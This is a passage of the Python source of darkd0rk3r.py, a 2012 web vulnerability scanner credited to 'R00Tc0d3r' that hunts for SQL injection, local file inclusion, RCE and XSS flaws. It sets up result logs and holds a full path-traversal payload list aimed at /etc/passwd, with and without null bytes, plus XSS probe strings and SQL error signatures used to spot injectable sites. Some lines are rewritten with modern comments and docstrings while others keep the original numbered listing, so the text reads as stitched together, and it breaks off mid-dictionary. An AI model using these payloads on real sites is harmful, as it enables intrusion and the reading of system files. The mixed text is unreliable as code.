1 | #!/usr/bin/python | |
2 | # This was written for educational purposes and pentesting only. Use it at your own risk. | |
3 | # The author will not be responsible for any damage! | |
4 | # !!! Special greetz for my friend sinner_01 !!! | |
5 | # Toolname : darkd0rk3r.py | |
6 | # Coder : R00Tc0d3r < <71gre> tigerlulz@gmx.com> | |
7 | # Version : 0.7 | |
8 | # Greetz for rsauron and low1z, great python coders | |
9 | # greetz for L33TCr3w , 8lulzsec | |
10 | # | |
11 | ||
12 | import string, sys, time, urllib2, cookielib, re, random, threading, socket, os, subprocess | |
13 | from random import choice | |
14 | ||
# Colours: ANSI SGR escape sequences used to tint terminal output.
W = "\033[0m"   # reset to the terminal's default rendition
R = "\033[31m"  # red foreground
G = "\033[32m"  # green foreground
O = "\033[33m"  # yellow foreground (SGR 33)
B = "\033[34m"  # blue foreground
21 | ||
22 | ||
# Banner
def logo():
    """Print the start-up banner to stdout.

    The first row is prefixed with the red colour code ``R`` and the last
    row is the reset code ``W``, so only the banner itself is tinted.
    Takes no arguments and returns None.
    """
    banner_rows = (
        R+"\n|---------------------------------------------------------------|",
        "| R00Tc0d3r[@]hotmail[dot]com |",
        "| 02/2012 darkd0rk3r.py v.0.7 |",
        "| R00Tc0d3r |",
        "| |",
        "|---------------------------------------------------------------|\n",
        W,
    )
    for row in banner_rows:
        # print(<one string>) emits the same bytes as the Python 2 print
        # statement this file was written with: the row plus a newline.
        print(row)
32 | ||
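# Clear the terminal, then show the banner.
# Only Windows uses "cls"; Linux, macOS, the BSDs and Cygwin all provide
# "clear". The previous check compared sys.platform against 'linux'/'linux2'
# only, so every other POSIX system was sent down the "cls" branch, where the
# command does not exist.
# shell=True is required because "cls" is a cmd.exe builtin. Both command
# strings are constants, so no external input ever reaches the shell.
subprocess.call("cls" if os.name == "nt" else "clear", shell=True)
logo()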
40 | ||
# Result logs, one file per finding class (SQLi, LFI, RCE, XSS).
# The names are relative, so the files are created in the current working
# directory; "a" appends to whatever an earlier run left there.
# NOTE(review): the handles are opened at import time and are not closed in
# the part of the file visible here, so buffered entries reach disk only on
# flush or interpreter exit. The files are created with the process's default
# permissions.
log = "darkd0rk3r-sqli.txt"
lfi_log = "darkd0rk3r-lfi.txt"
rce_log = "darkd0rk3r-rce.txt"
xss_log = "darkd0rk3r-xss.txt"

# A generator expression keeps the loop variable out of module scope and
# opens the files in the same order as before: sqli, lfi, rce, xss.
logfile, lfi_log_file, rce_log_file, xss_log_file = (
    open(log_path, "a") for log_path in (log, lfi_log, rce_log, xss_log)
)
49 | ||
# Module-level state shared by the rest of the script. The code that fills
# these lists is outside the visible part of the file; judging by the names
# they hold worker threads, collected URLs and confirmed findings -- TODO confirm.
threads, finallist, vuln = [], [], []

# Seconds. setdefaulttimeout() applies process-wide to every socket created
# afterwards, which includes the sockets opened by the HTTP library.
timeout = 300
socket.setdefaulttimeout(timeout)
55 | ||
56 | ||
57 | ||
58 | ||
# Local-file-inclusion probe strings: "/etc/passwd" behind an increasing number
# of "../" segments, each depth listed twice -- first with a trailing "%00",
# then without it. How they are attached to a request is not visible in this
# part of the file.
# "%00" is a URL-encoded NUL byte; presumably it is meant to cut off a suffix
# (such as ".php") that the server-side include appends -- TODO confirm against
# the caller. PHP rejects NUL bytes in file paths since 5.3.4, so that half of
# the list only matters for older runtimes.
# For detection: a query parameter carrying stacked "../" segments followed by
# "etc/passwd", with or without "%00", is a high-signal pattern in access logs
# and WAF rules. The server-side fix is to resolve include paths against a
# fixed allow-list or base directory.
lfis = ["/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../../etc/passwd%00","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]
60 | ||
# Reflection markers for the XSS check: the same inert <h1> element, once raw
# and once percent-encoded. Neither string contains script.
# The comparison logic is outside the visible part of the file; presumably a
# response that echoes the raw marker unescaped is logged as a finding -- TODO
# confirm. On the server side that outcome means output encoding is missing
# for the reflected parameter.
xsses = [
    "<h1>XSS by baltazar</h1>",
    "%3Ch1%3EXSS%20by%20baltazar%3C/h1%3E",
]
62 | ||
63 | sqlerrors = {'MySQL': 'error in your SQL syntax', | |
64 | 'MiscError': 'mysql_fetch', | |
65 | 'MiscError2': 'num_rows', | |
66 | 'Oracle': 'ORA-01756', | |
67 | 'JDBC_CFM': 'Error Executing Database Query', | |
68 | 'JDBC_CFM2': 'SQLServer JDBC Driver', | |
69 | 'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server', | |
70 | 'MSSQL_Uqm': 'Unclosed quotation mark', | |
71 | 'MS-Access_ODBC': 'ODBC Microsoft Access Driver', | |
72 | 'MS-Access_JETdb': 'Microsoft JET Database', | |
73 | 'Error Occurred While Processing Request' : 'Error Occurred While Processing Request', | |
74 | 'Server Error' : 'Server Error', | |
75 | 'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error', | |
76 | 'Invalid Querystring' : 'Invalid Querystring', | |
77 | 'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC', | |
78 | 'VBScript Runtime' : 'VBScript Runtime', | |
79 | 'ADODB.Field' : 'ADODB.Field', | |
80 | 'BOF or EOF' : 'BOF or EOF', | |
81 | 'ADODB.Command' : 'ADODB.Command', | |
82 | 'JET Database' : 'JET Database', | |
83 | 'mysql_fetch_array()' : 'mysql_fetch_array()', | |
84 | 'Syntax error' : 'Syntax error', | |
85 | 'mysql_ |